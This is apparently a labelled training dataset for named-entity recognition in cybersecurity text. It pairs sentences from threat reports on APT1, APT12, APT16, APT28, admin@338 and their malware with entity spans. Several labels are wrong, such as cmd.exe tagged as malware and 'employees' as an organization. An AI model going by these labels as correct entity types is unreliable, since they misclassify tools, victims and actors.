{"text": "In the 2016 Internet Crime Report published by the FBI , BEC was specifically highlighted as a \" Hot Topic \" , having been attributed to more than US$360 million in losses and gaining status as its own category of attack . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": {"ORGANIZATION: FBI": [[51, 54]], "ORGANIZATION: Uyghur ethnic group": [[290, 309]], "ORGANIZATION: Muslim minority group": [[314, 335]]}, "info": {"id": "cyberner_stix_train_008026", "source": "cyberner_stix_train"}}
{"text": "My initial thought was the worst-case scenario – they ’ve been compromised and are distributing malware ! I immediately downloaded the file from the website , but everything looked normal .", "spans": {}, "info": {"id": "cyberner_stix_train_008027", "source": "cyberner_stix_train"}}
{"text": "Working with U.S. Government partners , DHS and FBI identified Internet Protocol ( IP ) addresses associated with a malware variant , known as DeltaCharlie , used to manage North Korea 's distributed denial-of-service ( DDoS ) botnet infrastructure .", "spans": {"ORGANIZATION: Government": [[18, 28]], "ORGANIZATION: DHS": [[40, 43]], "ORGANIZATION: FBI": [[48, 51]], "MALWARE: DeltaCharlie": [[143, 155]], "TOOL: botnet infrastructure": [[227, 248]]}, "info": {"id": "cyberner_stix_train_008028", "source": "cyberner_stix_train"}}
{"text": "Following is the HTTP response from the C2 server , containing the encrypted configuration : EventBot Encrypted HTTP response returned from the C2 Encrypted HTTP response returned from the C2 . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam . The MPK bot is not publicly available and had previously been attributed to an adversary group called \" Rocket Kitten \" which has often been thought to be a state sponsored adversary operating in the Middle East region .", "spans": {"MALWARE: EventBot": [[93, 101]], "MALWARE: Bemstour": [[228, 236]], "MALWARE: MPK bot": [[304, 311]], "THREAT_ACTOR: Rocket Kitten": [[404, 417]]}, "info": {"id": "cyberner_stix_train_008029", "source": "cyberner_stix_train"}}
{"text": "Investigators indicated that the actors may have gained access to DCCC systems as early as March .", "spans": {"ORGANIZATION: DCCC": [[66, 70]]}, "info": {"id": "cyberner_stix_train_008030", "source": "cyberner_stix_train"}}
{"text": "The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party .", "spans": {"MALWARE: cmd.exe": [[80, 87]], "ORGANIZATION: employees": [[237, 246]], "ORGANIZATION: government agencies": [[270, 289]], "ORGANIZATION: security services": [[292, 309]], "ORGANIZATION: students": [[324, 332]], "ORGANIZATION: Fatah political party": [[365, 386]]}, "info": {"id": "cyberner_stix_train_008031", "source": "cyberner_stix_train"}}
{"text": "Although BokBot has aided the distribution of TrickBot since 2017 , the development of custom TrickBot modules for the specific campaign has not been observed before . BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems .", "spans": {"TOOL: BokBot": [[9, 15]], "TOOL: TrickBot": [[46, 54]], "TOOL: TrickBot modules": [[94, 110]], "THREAT_ACTOR: BRONZE BUTLER": [[168, 181]], "VULNERABILITY: zero-day": [[237, 245]]}, "info": {"id": "cyberner_stix_train_008032", "source": "cyberner_stix_train"}}
{"text": "The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "TOOL: publicly available RATs": [[117, 140]], "TOOL: Poison Ivy": [[149, 159]], "TOOL: non-public backdoors": [[175, 195]]}, "info": {"id": "dnrti_train_000000", "source": "dnrti_train"}}
{"text": "The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "ORGANIZATION: media companies": [[42, 57]]}, "info": {"id": "dnrti_train_000001", "source": "dnrti_train"}}
{"text": "Multiple China-based cyber threat groups have targeted international media organizations in the past .", "spans": {"THREAT_ACTOR: cyber threat groups": [[21, 40]], "ORGANIZATION: international media organizations": [[55, 88]]}, "info": {"id": "dnrti_train_000002", "source": "dnrti_train"}}
{"text": "The admin@338 has targeted international media organizations in the past .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "ORGANIZATION: international media organizations": [[27, 60]]}, "info": {"id": "dnrti_train_000003", "source": "dnrti_train"}}
{"text": "In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television .", "spans": {"THREAT_ACTOR: admin@338": [[21, 30]], "ORGANIZATION: media organizations": [[89, 108]]}, "info": {"id": "dnrti_train_000004", "source": "dnrti_train"}}
{"text": "In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television .", "spans": {"THREAT_ACTOR: threat actors": [[21, 34]], "ORGANIZATION: media organizations": [[93, 112]]}, "info": {"id": "dnrti_train_000005", "source": "dnrti_train"}}
{"text": "In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations .", "spans": {"THREAT_ACTOR: admin@338": [[21, 30]], "ORGANIZATION: media organizations": [[89, 108]]}, "info": {"id": "dnrti_train_000006", "source": "dnrti_train"}}
{"text": "The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "ORGANIZATION: policy organizations": [[56, 76]], "ORGANIZATION: audiences": [[165, 174]]}, "info": {"id": "dnrti_train_000007", "source": "dnrti_train"}}
{"text": "Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer .", "spans": {"TOOL: LOWBALL malware": [[9, 24]], "THREAT_ACTOR: admin@338": [[65, 74]], "MALWARE: upload.bat": [[101, 111]]}, "info": {"id": "dnrti_train_000008", "source": "dnrti_train"}}
{"text": "We observed the admin@338 upload a second stage malware , known as BUBBLEWRAP ( also known as Backdoor.APT.FakeWinHTTPHelper ) to their Dropbox account along with the following command .", "spans": {"THREAT_ACTOR: admin@338": [[16, 25]], "TOOL: BUBBLEWRAP": [[67, 77]], "TOOL: Backdoor.APT.FakeWinHTTPHelper": [[94, 124]]}, "info": {"id": "dnrti_train_000009", "source": "dnrti_train"}}
{"text": "We have previously observed the admin@338 group use BUBBLEWRAP .", "spans": {"THREAT_ACTOR: admin@338 group": [[32, 47]], "TOOL: BUBBLEWRAP": [[52, 62]]}, "info": {"id": "dnrti_train_000010", "source": "dnrti_train"}}
{"text": "The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets .", "spans": {"TOOL: LOWBALL": [[4, 11]], "THREAT_ACTOR: group": [[43, 48]], "TOOL: BUBBLEWRAP": [[106, 116]]}, "info": {"id": "dnrti_train_000011", "source": "dnrti_train"}}
{"text": "The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]]}, "info": {"id": "dnrti_train_000012", "source": "dnrti_train"}}
{"text": "An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong .", "spans": {"THREAT_ACTOR: APT": [[3, 6]], "THREAT_ACTOR: gang": [[7, 11]]}, "info": {"id": "dnrti_train_000013", "source": "dnrti_train"}}
{"text": "The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: admin@338": [[54, 63]], "TOOL: remote access Trojans": [[121, 142]], "TOOL: Poison Ivy": [[151, 161]], "ORGANIZATION: financial firms": [[187, 202]]}, "info": {"id": "dnrti_train_000014", "source": "dnrti_train"}}
{"text": "The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy .", "spans": {"THREAT_ACTOR: agroup": [[4, 10]], "THREAT_ACTOR: admin@338": [[55, 64]], "TOOL: remote access Trojans": [[122, 143]], "TOOL: Poison Ivy": [[152, 162]], "ORGANIZATION: financial firms": [[188, 203]]}, "info": {"id": "dnrti_train_000015", "source": "dnrti_train"}}
{"text": "The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "ORGANIZATION: defense sectors": [[130, 145]]}, "info": {"id": "dnrti_train_000016", "source": "dnrti_train"}}
{"text": "The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors .", "spans": {"THREAT_ACTOR: APT actor": [[4, 13]], "ORGANIZATION: defense sectors": [[130, 145]]}, "info": {"id": "dnrti_train_000017", "source": "dnrti_train"}}
{"text": "In August 2013 , FireEye reported that admin@338 had been using the Poison Ivy RAT in its operations .", "spans": {"ORGANIZATION: FireEye": [[17, 24]], "THREAT_ACTOR: admin@338": [[39, 48]], "TOOL: Poison Ivy RAT": [[68, 82]]}, "info": {"id": "dnrti_train_000018", "source": "dnrti_train"}}
{"text": "In March 2014 , the admin@338 leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank .", "spans": {"THREAT_ACTOR: admin@338": [[20, 29]], "ORGANIZATION: think tank": [[157, 167]]}, "info": {"id": "dnrti_train_000019", "source": "dnrti_train"}}
{"text": "In March 2014 , the group leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank .", "spans": {"THREAT_ACTOR: group": [[20, 25]], "ORGANIZATION: think tank": [[153, 163]]}, "info": {"id": "dnrti_train_000020", "source": "dnrti_train"}}
{"text": "According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "THREAT_ACTOR: admin@338": [[27, 36]], "VULNERABILITY: Microsoft Office vulnerabilities": [[104, 136]], "TOOL: LOWBALL": [[187, 194]]}, "info": {"id": "dnrti_train_000021", "source": "dnrti_train"}}
{"text": "According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "THREAT_ACTOR: attackers": [[27, 36]], "VULNERABILITY: Microsoft Office vulnerabilities": [[104, 136]], "TOOL: LOWBALL": [[187, 194]]}, "info": {"id": "dnrti_train_000022", "source": "dnrti_train"}}
{"text": "The admin@338 's Dropbox accounts have also been found to contain a different backdoor dubbed BUBBLEWRAP .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "TOOL: BUBBLEWRAP": [[94, 104]]}, "info": {"id": "dnrti_train_000023", "source": "dnrti_train"}}
{"text": "Researchers have pointed out that it is not uncommon for China-based threat groups to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement .", "spans": {"THREAT_ACTOR: threat groups": [[69, 82]], "ORGANIZATION: media organizations": [[103, 122]]}, "info": {"id": "dnrti_train_000024", "source": "dnrti_train"}}
{"text": "Researchers have pointed out that it is not uncommon for admin@338 to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement .", "spans": {"THREAT_ACTOR: admin@338": [[57, 66]], "ORGANIZATION: media organizations": [[87, 106]]}, "info": {"id": "dnrti_train_000025", "source": "dnrti_train"}}
{"text": "This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose .", "spans": {"ORGANIZATION: FireEye": [[25, 32]], "THREAT_ACTOR: group": [[51, 56]], "THREAT_ACTOR: hackers": [[74, 81]], "THREAT_ACTOR: admin@338": [[89, 98]], "THREAT_ACTOR: attackers": [[158, 167]], "ORGANIZATION: government officials": [[177, 197]], "THREAT_ACTOR: cyber espionage": [[233, 248]]}, "info": {"id": "dnrti_train_000026", "source": "dnrti_train"}}
{"text": "The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "TOOL: Poison Ivy RAT": [[31, 45]], "TOOL: WinHTTPHelper malware": [[50, 71]], "ORGANIZATION: government officials": [[103, 123]]}, "info": {"id": "dnrti_train_000027", "source": "dnrti_train"}}
{"text": "The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"THREAT_ACTOR: admin@338": [[4, 13]], "TOOL: Poison Ivy RAT": [[31, 45]], "TOOL: WinHTTPHelper malware": [[50, 71]], "ORGANIZATION: government officials": [[103, 123]]}, "info": {"id": "dnrti_train_000028", "source": "dnrti_train"}}
{"text": "FireEye analysts documented the admin@338 group 's activities in a previous paper titled Poison Ivy : Assessing Damage and Extracting Intelligence paper .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: admin@338 group": [[32, 47]], "TOOL: Poison Ivy": [[89, 99]]}, "info": {"id": "dnrti_train_000029", "source": "dnrti_train"}}
{"text": "The spear-phishing campaign against Asian entities isn't isolated , the admin@338 also started another attack against the US-based think tank on 14th March .", "spans": {"THREAT_ACTOR: admin@338": [[72, 81]], "ORGANIZATION: think tank": [[131, 141]]}, "info": {"id": "dnrti_train_000030", "source": "dnrti_train"}}
{"text": "Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China 's cyber threat actors .", "spans": {"THREAT_ACTOR: APT1": [[41, 45]], "THREAT_ACTOR: cyber threat actors": [[120, 139]]}, "info": {"id": "dnrti_train_000031", "source": "dnrti_train"}}
{"text": "FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic , and trade policy .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: admin@338": [[28, 37]], "THREAT_ACTOR: group": [[69, 74]]}, "info": {"id": "dnrti_train_000032", "source": "dnrti_train"}}
{"text": "The simplest conclusion based on these facts is that APT1 is operating in China , and most likely in Shanghai .", "spans": {"THREAT_ACTOR: APT1": [[53, 57]]}, "info": {"id": "dnrti_train_000033", "source": "dnrti_train"}}
{"text": "These data sets show that APT1 is either operating in China during normal Chinese business hours or that APT1 is intentionally going to painstaking lengths to look like they are .", "spans": {"THREAT_ACTOR: APT1": [[26, 30], [105, 109]]}, "info": {"id": "dnrti_train_000034", "source": "dnrti_train"}}
{"text": "APT1 has used and steadily modified BISCUIT since as early as 2007 and continues to use it presently .", "spans": {"THREAT_ACTOR: APT1": [[0, 4]], "TOOL: BISCUIT": [[36, 43]]}, "info": {"id": "dnrti_train_000035", "source": "dnrti_train"}}
{"text": "While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT .", "spans": {"THREAT_ACTOR: APT1": [[6, 10]], "TOOL: publicly available backdoors": [[38, 66]], "TOOL: Poison Ivy": [[75, 85]], "TOOL: Gh0st RAT": [[90, 99]]}, "info": {"id": "dnrti_train_000036", "source": "dnrti_train"}}
{"text": "Given the mission , resourcing , and location of PLA Unit 61398 , we conclude that PLA Unit 61398 is APT1 .", "spans": {"THREAT_ACTOR: PLA Unit 61398": [[49, 63], [83, 97]], "THREAT_ACTOR: APT1": [[101, 105]]}, "info": {"id": "dnrti_train_000037", "source": "dnrti_train"}}
{"text": "APT1 were a highly prolific cyber-attack group operating out of China .", "spans": {"THREAT_ACTOR: APT1": [[0, 4]], "THREAT_ACTOR: cyber-attack group": [[28, 46]]}, "info": {"id": "dnrti_train_000038", "source": "dnrti_train"}}
{"text": "APT1 is a China-based cyber-espionage group , active since mid-2006 .", "spans": {"THREAT_ACTOR: APT1": [[0, 4]], "THREAT_ACTOR: cyber-espionage group": [[22, 43]]}, "info": {"id": "dnrti_train_000039", "source": "dnrti_train"}}
{"text": "APT12 's targets are consistent with larger People 's Republic of China ( PRC ) goals .", "spans": {"THREAT_ACTOR: APT12": [[0, 5]]}, "info": {"id": "dnrti_train_000040", "source": "dnrti_train"}}
{"text": "Since the release of the Arbor blog post , FireEye has observed APT12 use a modified backdoor that we call HIGHTIDE .", "spans": {"ORGANIZATION: Arbor": [[25, 30]], "ORGANIZATION: FireEye": [[43, 50]], "THREAT_ACTOR: APT12": [[64, 69]], "TOOL: HIGHTIDE": [[107, 115]]}, "info": {"id": "dnrti_train_000041", "source": "dnrti_train"}}
{"text": "However , the malware shared several traits with the RIPTIDE and HIGHTIDE backdoor that we have attributed to APT12 .", "spans": {"TOOL: RIPTIDE": [[53, 60]], "TOOL: HIGHTIDE backdoor": [[65, 82]], "THREAT_ACTOR: APT12": [[110, 115]]}, "info": {"id": "dnrti_train_000042", "source": "dnrti_train"}}
{"text": "From October 2012 to May 2014 , FireEye observed APT12 utilizing RIPTIDE , that communicates via HTTP to a hard-coded command and control ( C2 ) server .", "spans": {"ORGANIZATION: FireEye": [[32, 39]], "THREAT_ACTOR: APT12": [[49, 54]], "TOOL: RIPTIDE": [[65, 72]], "TOOL: HTTP": [[97, 101]]}, "info": {"id": "dnrti_train_000043", "source": "dnrti_train"}}
{"text": "Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 .", "spans": {"THREAT_ACTOR: APT12": [[31, 36]], "TOOL: HIGHTIDE": [[65, 73]], "TOOL: Microsoft Word": [[82, 96]], "TOOL: .doc": [[99, 103]], "VULNERABILITY: CVE-2012-0158": [[129, 142]]}, "info": {"id": "dnrti_train_000044", "source": "dnrti_train"}}
{"text": "FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "TOOL: RIPTIDE": [[33, 40]], "TOOL: HIGHTIDE": [[44, 52]], "THREAT_ACTOR: APT12": [[123, 128]]}, "info": {"id": "dnrti_train_000045", "source": "dnrti_train"}}
{"text": "They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors .", "spans": {"TOOL: publicly available RATs": [[109, 132]], "TOOL: Poison Ivy": [[141, 151]], "TOOL: non-public backdoors": [[167, 187]]}, "info": {"id": "dnrti_train_000046", "source": "dnrti_train"}}
{"text": "A China-based cyber threat group , which FireEye tracks as an uncategorized advanced persistent threat ( APT ) group and other researchers refer to as admin@338 , may have conducted the activity .", "spans": {"THREAT_ACTOR: cyber threat group": [[14, 32]], "ORGANIZATION: FireEye": [[41, 48]], "THREAT_ACTOR: threat": [[96, 102]], "THREAT_ACTOR: admin@338": [[151, 160]]}, "info": {"id": "dnrti_train_000047", "source": "dnrti_train"}}
{"text": "The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: policy organizations": [[52, 72]], "ORGANIZATION: audiences": [[161, 170]]}, "info": {"id": "dnrti_train_000048", "source": "dnrti_train"}}
{"text": "About four months after The New York Times publicized an attack on its network , the APT12 behind the intrusion deployed updated versions of their Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe malware families .", "spans": {"ORGANIZATION: The New York Times": [[24, 42]], "THREAT_ACTOR: APT12": [[85, 90]], "TOOL: Backdoor.APT.Aumlib": [[147, 166]], "TOOL: Backdoor.APT.Ixeshe malware families": [[171, 207]]}, "info": {"id": "dnrti_train_000049", "source": "dnrti_train"}}
{"text": "With this in mind , this week we are providing some indicators for a China based adversary who we crypt as \" NUMBERED PANDA \" Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc .", "spans": {"THREAT_ACTOR: NUMBERED PANDA": [[109, 123]], "THREAT_ACTOR: Numbered Panda": [[126, 140]], "THREAT_ACTOR: DYNCALC": [[227, 234]], "THREAT_ACTOR: IXESHE": [[237, 243]], "THREAT_ACTOR: JOY RAT": [[246, 253]], "THREAT_ACTOR: APT-12": [[256, 262]]}, "info": {"id": "dnrti_train_000050", "source": "dnrti_train"}}
{"text": "Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc .", "spans": {"THREAT_ACTOR: Numbered Panda": [[0, 14]], "THREAT_ACTOR: DYNCALC": [[101, 108]], "THREAT_ACTOR: IXESHE": [[111, 117]], "THREAT_ACTOR: JOY RAT": [[120, 127]], "THREAT_ACTOR: APT-12": [[130, 136]]}, "info": {"id": "dnrti_train_000051", "source": "dnrti_train"}}
{"text": "The new campaigns mark the first significant stirrings from the APT12 since it went silent in January in the wake of a detailed expose of the group and its exploits — and a retooling of what security researchers believe is a massive spying operation based in China .", "spans": {"THREAT_ACTOR: APT12": [[64, 69]], "THREAT_ACTOR: group": [[142, 147]]}, "info": {"id": "dnrti_train_000052", "source": "dnrti_train"}}
{"text": "Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT16 launched several spear phishing attacks targeting Japan and Taiwan in the high-tech , government services , media and financial services industries .", "spans": {"THREAT_ACTOR: APT16": [[85, 90]]}, "info": {"id": "dnrti_train_000053", "source": "dnrti_train"}}
{"text": "Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries .", "spans": {"THREAT_ACTOR: APT groups": [[85, 95]]}, "info": {"id": "dnrti_train_000054", "source": "dnrti_train"}}
{"text": "On November 26 , 2015 , a suspected China-based APT16 sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies .", "spans": {"THREAT_ACTOR: APT16": [[48, 53]], "ORGANIZATION: financial": [[133, 142]], "ORGANIZATION: high-tech companies": [[147, 166]]}, "info": {"id": "dnrti_train_000055", "source": "dnrti_train"}}
{"text": "On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies .", "spans": {"THREAT_ACTOR: APT group": [[48, 57]], "ORGANIZATION: financial": [[137, 146]], "ORGANIZATION: high-tech companies": [[151, 170]]}, "info": {"id": "dnrti_train_000056", "source": "dnrti_train"}}
{"text": "While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China-based APT group that we refer to as APT16 .", "spans": {"THREAT_ACTOR: APT group": [[149, 158]], "THREAT_ACTOR: APT16": [[179, 184]]}, "info": {"id": "dnrti_train_000057", "source": "dnrti_train"}}
{"text": "APT16 actors sent spear phishing emails to two Taiwanese media organizations .", "spans": {"THREAT_ACTOR: APT16 actors": [[0, 12]], "ORGANIZATION: media organizations": [[57, 76]]}, "info": {"id": "dnrti_train_000058", "source": "dnrti_train"}}
{"text": "On the same date that APT16 targeted Taiwanese media , suspected Chinese APT actors also targeted a Taiwanese government agency , sending a lure document that contained instructions for registration and subsequent listing of goods on a local Taiwanese auction website .", "spans": {"THREAT_ACTOR: APT16": [[22, 27]], "THREAT_ACTOR: APT actors": [[73, 83]], "ORGANIZATION: government agency": [[110, 127]]}, "info": {"id": "dnrti_train_000059", "source": "dnrti_train"}}
{"text": "It is possible , although not confirmed , that APT16 was also responsible for targeting this government agency , given both the timeframe and the use of the same n-day to eventually deploy the ELMER backdoor .", "spans": {"THREAT_ACTOR: APT16": [[47, 52]], "ORGANIZATION: government agency": [[93, 110]], "TOOL: ELMER backdoor": [[193, 207]]}, "info": {"id": "dnrti_train_000060", "source": "dnrti_train"}}
{"text": "Despite the differing sponsorship , penetration of Hong Kong and Taiwan-based media organizations continues to be a priority for China-based APT16 .", "spans": {"ORGANIZATION: media organizations": [[78, 97]], "THREAT_ACTOR: APT16": [[141, 146]]}, "info": {"id": "dnrti_train_000061", "source": "dnrti_train"}}
{"text": "The suspected APT16 targeting of the Taiwanese government agency – in addition to the Taiwanese media organizations – further supports this possibility .", "spans": {"THREAT_ACTOR: APT16": [[14, 19]], "ORGANIZATION: government agency": [[47, 64]], "ORGANIZATION: media organizations": [[96, 115]]}, "info": {"id": "dnrti_train_000062", "source": "dnrti_train"}}
{"text": "APT17 was embedding the encoded CnC IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a \" dead drop resolver \" .", "spans": {"THREAT_ACTOR: APT17": [[0, 5]], "TOOL: BLACKCOFFEE malware": [[55, 74]], "ORGANIZATION: information security community": [[163, 193]]}, "info": {"id": "dnrti_train_000063", "source": "dnrti_train"}}
{"text": "APT17 , also known as DeputyDog , is a China-based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": {"THREAT_ACTOR: APT17": [[0, 5]], "THREAT_ACTOR: DeputyDog": [[22, 31]], "THREAT_ACTOR: threat group": [[51, 63]], "ORGANIZATION: FireEye Intelligence": [[69, 89]], "ORGANIZATION: government entities": [[146, 165]], "ORGANIZATION: law firms": [[191, 200]], "ORGANIZATION: information technology companies": [[203, 235]], "ORGANIZATION: mining companies": [[238, 254]], "ORGANIZATION: non-government organizations": [[261, 289]]}, "info": {"id": "dnrti_train_000064", "source": "dnrti_train"}}
{"text": "FireEye has monitored APT17 's use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the CnC communication as queries to web search engines .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: APT17": [[22, 27]], "TOOL: BLACKCOFFEE": [[38, 49]]}, "info": {"id": "dnrti_train_000065", "source": "dnrti_train"}}
{"text": "The use of BLACKCOFFEE demonstrates APT17 's evolving use of public websites to hide in plain sight .", "spans": {"TOOL: BLACKCOFFEE": [[11, 22]], "THREAT_ACTOR: APT17": [[36, 41]]}, "info": {"id": "dnrti_train_000066", "source": "dnrti_train"}}
{"text": "TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology .", "spans": {"THREAT_ACTOR: TG-0416": [[0, 7]], "THREAT_ACTOR: Advanced Persistent Threat": [[47, 73]], "THREAT_ACTOR: APT": [[76, 79]], "ORGANIZATION: human rights groups": [[205, 224]]}, "info": {"id": "dnrti_train_000067", "source": "dnrti_train"}}
{"text": "The APT18 then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system .", "spans": {"THREAT_ACTOR: APT18": [[4, 9]], "TOOL: hcdLoader RAT": [[29, 42]]}, "info": {"id": "dnrti_train_000068", "source": "dnrti_train"}}
{"text": "The malware used by the Wekby group has ties to the HTTPBrowser malware family , and uses DNS requests as a command and control mechanism .", "spans": {"THREAT_ACTOR: Wekby group": [[24, 35]], "TOOL: HTTPBrowser malware family": [[52, 78]]}, "info": {"id": "dnrti_train_000069", "source": "dnrti_train"}}
{"text": "These URIs result in the download of an installer , which creates a PE of the malware typically known as HTTPBrowser , but called Token Control by the Wekby group themselves ( based upon the PDB strings found within many of the samples ) .", "spans": {"TOOL: HTTPBrowser": [[105, 116]], "TOOL: Token Control": [[130, 143]], "THREAT_ACTOR: Wekby group": [[151, 162]]}, "info": {"id": "dnrti_train_000070", "source": "dnrti_train"}}
{"text": "APT19 seemed to be going after defense sector firms , Chinese dissident groups and political , financial , pharmaceutical and energy sectors that could benefit the Chinese economy .", "spans": {"THREAT_ACTOR: APT19": [[0, 5]], "ORGANIZATION: defense sector firms": [[31, 51]], "ORGANIZATION: energy sectors": [[126, 140]]}, "info": {"id": "dnrti_train_000071", "source": "dnrti_train"}}
{"text": "APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy .", "spans": {"THREAT_ACTOR: APT19": [[0, 5]], "ORGANIZATION: defense sector firms": [[31, 51]], "ORGANIZATION: energy sectors": [[196, 210]]}, "info": {"id": "dnrti_train_000072", "source": "dnrti_train"}}
{"text": "APT28 malware , in particular the family of modular backdoors that we call CHOPSTICK , indicates a formal code development environment .", "spans": {"TOOL: APT28 malware": [[0, 13]], "TOOL: CHOPSTICK": [[75, 84]]}, "info": {"id": "dnrti_train_000074", "source": "dnrti_train"}}
{"text": "However , three themes in APT28 's targeting clearly reflects areas of specific interest to an Eastern European government , most likely the Russian government .", "spans": {"THREAT_ACTOR: APT28": [[26, 31]]}, "info": {"id": "dnrti_train_000075", "source": "dnrti_train"}}
{"text": "We identified three themes in APT28 's lures and registered domains , which together are particularly relevant to the Russian government .", "spans": {"THREAT_ACTOR: APT28": [[30, 35]]}, "info": {"id": "dnrti_train_000076", "source": "dnrti_train"}}
{"text": "Georgian military security issues , particularly with regard to U.S. cooperation and NATO , provide a strong incentive for Russian state-sponsored threat actors to steal information that sheds light on these topics .", "spans": {"THREAT_ACTOR: threat actors": [[147, 160]]}, "info": {"id": "dnrti_train_000077", "source": "dnrti_train"}}
{"text": "APT28 's malware settings suggest that the developers have done the majority of their work in a Russian language build environment during Russian business hours , which suggests that the Russian government is APT28 's sponsor .", "spans": {"THREAT_ACTOR: APT28": [[0, 5], [209, 214]]}, "info": {"id": "dnrti_train_000079", "source": "dnrti_train"}}
{"text": "We believe that APT28 's targeting of the MOD aligns with Russian threat perceptions .", "spans": {"THREAT_ACTOR: APT28": [[16, 21]]}, "info": {"id": "dnrti_train_000080", "source": "dnrti_train"}}
{"text": "We assess that APT28 is most likely sponsored by the Russian government .", "spans": {"THREAT_ACTOR: APT28": [[15, 20]]}, "info": {"id": "dnrti_train_000081", "source": "dnrti_train"}}
{"text": "Given the available data , we assess that APT28 's work is sponsored by the Russian government .", "spans": {"THREAT_ACTOR: APT28": [[42, 47]]}, "info": {"id": "dnrti_train_000082", "source": "dnrti_train"}}
